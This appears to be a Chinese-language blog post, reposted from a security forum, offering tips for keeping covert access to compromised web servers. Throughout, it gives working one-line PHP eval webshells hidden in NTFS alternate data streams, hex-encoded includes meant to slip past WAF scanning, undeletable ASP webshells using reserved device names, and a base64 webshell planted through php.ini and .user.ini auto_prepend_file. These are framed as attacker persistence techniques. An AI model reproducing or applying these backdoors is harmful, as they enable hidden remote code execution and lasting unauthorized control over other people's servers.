脚本维权相关的一些Tips

0x01

维持权限，为后渗透阶段做准备，脚本方面有哪些有趣的Tips呢?结合系统一些特性，我们可以更好的隐蔽我们的后门。

0x02

创建系统隐藏文件
attrib +s +a +r +h / attrib +s +h 文件名

查看隐藏文件

0x03

利用ADS隐藏文件
NTFS交换数据流（Alternate　Data　Streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS数据流，我们可以做很多有趣的事情。

首先创建ADS隐藏文件

在命令行，echo一个数据流进去，比如index文件是正常文件。
echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

可用 dir /r 命令来查看

修改与删除ADS隐藏文件

修改进入文件所在目录: notepad index.php:shell.jpg

删除index.php:shell.jpg呢？直接删除index.php。

如果你对NTFS文件宿主寄生虫感兴趣可以参考key表哥的这篇文章。
文件寄生——NTFS文件流实际应用

文件包含

我们生成了index.php:shell.jpg，可以通过包含文件的方式来使用。

<?php include('index.php:shell.jpg');?>

还可以用上面学的隐藏include.php

免杀

但是躲不过waf扫描。

pack()函数
该函数用来将对应的参数打包成二进制字符串。

根据这个特性我们把 index.php:shell.jpg hex编码来绕过waf。

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK('H*',$$b));

0x04

asp不死僵尸
主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
Windows 下不能够以下面这些字样来命名文件或文件夹：

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9

生成

copy rootkit.asp \.D:wwwrootaux.test.asp

这类文件无法在图形界面删除，只能在命令行下删除：
del \.D:wwwrootaux.test.asp

0x05

phpinfo查看是否开启环境变量 include_path

在C盘，创建 C:phppear目录，把木马文件丢上去。

再包含下就OK了，大多数waf并不会扫描这个路径，很容易被人忽略。

0x06

php.ini后门
将后门写入php.ini

allow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"
                            // base64 <?php @eval($_REQUEST[cmd]);?>
　　　　　　　　　            // 后门类型可自己修改。

完成后需要重新加载PHP.ini
使用死循环
<?php while(true){} ?>

任意PHP页面都可以用菜刀连接。

也可以直接使用.user.ini
简单来说，它和 php.ini 功能一样，但是是高度自定义，程序执行时会先寻找当前目录下是否存在 .user.ini 文件，如果没有会继续向根目录寻找，直到配置目录下的 php.ini。

auto_prepend_file = 1.txt
user_ini.cache_ttl = 10  //设置加载时间为10s 不需要重启apache时间一到自动加载。

Liunx

Windows与Linux两者在这方面应用是不同的，如果你想了解在Linux环境下php.ini的特性的更多特性，或者技巧可以参考这篇文章。
巧用 php.ini 留后门维持权限（需要高权限）

0x07

php backdoor
也叫做PHP扩展后门，隐蔽性比webshell强度了。我们使用的是Micropoor大牛的php backdoor

How to install?

Linux_php_backdoor下载

windows_php_backdoor下载

0x08

参考致谢
https://www.cnblogs.com/xiaozi/p/7610984.html
https://paper.tuisec.win/detail/e7e0e752a08c09c
https://www.t00ls.net/viewthread.php?tid=38906&highlight=php.ini
https://www.t00ls.net/viewthread.php?tid=35053&highlight=php%2B%E5%90%8E%E9%97%A8
https://www.t00ls.net/viewthread.php?tid=44911&highlight=php%2B%E5%90%8E%E9%97%A8

来源：【https://xz.aliyun.com/】，感谢【抹布】

原文始发于微信公众号（衡阳信安）：脚本维权相关的一些Tips